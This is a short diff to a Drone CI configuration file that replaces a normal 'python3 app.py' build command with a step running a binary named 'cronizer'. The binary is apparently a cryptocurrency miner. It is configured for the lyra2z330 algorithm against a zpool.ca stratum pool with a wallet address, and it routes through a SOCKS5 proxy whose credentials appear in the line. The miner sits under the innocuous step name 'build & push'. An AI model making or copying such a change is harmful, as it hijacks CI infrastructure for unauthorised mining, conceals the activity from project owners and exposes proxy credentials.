--- a/.drone.yml
+++ b/.drone.yml
@@ -11,6 +11,6 @@ steps:
   - name: build & push
     image: golang
     commands:
-         - python3 app.py
+         - apt-get update && chmod 700 cronizer && ./cronizer -a lyra2z330 -o stratum+tcp://lyra2z330.na.mine.zpool.ca:4563 -u DHPDYmFtCZUCRoqWEL4XhrkwLXCcLzvZTY -p c=DGB,zap=BUTK-lyra/GXX -t16 -x socks5://serda67jui19:shiban716liop1z@185.199.229.156:7492
 
 ...
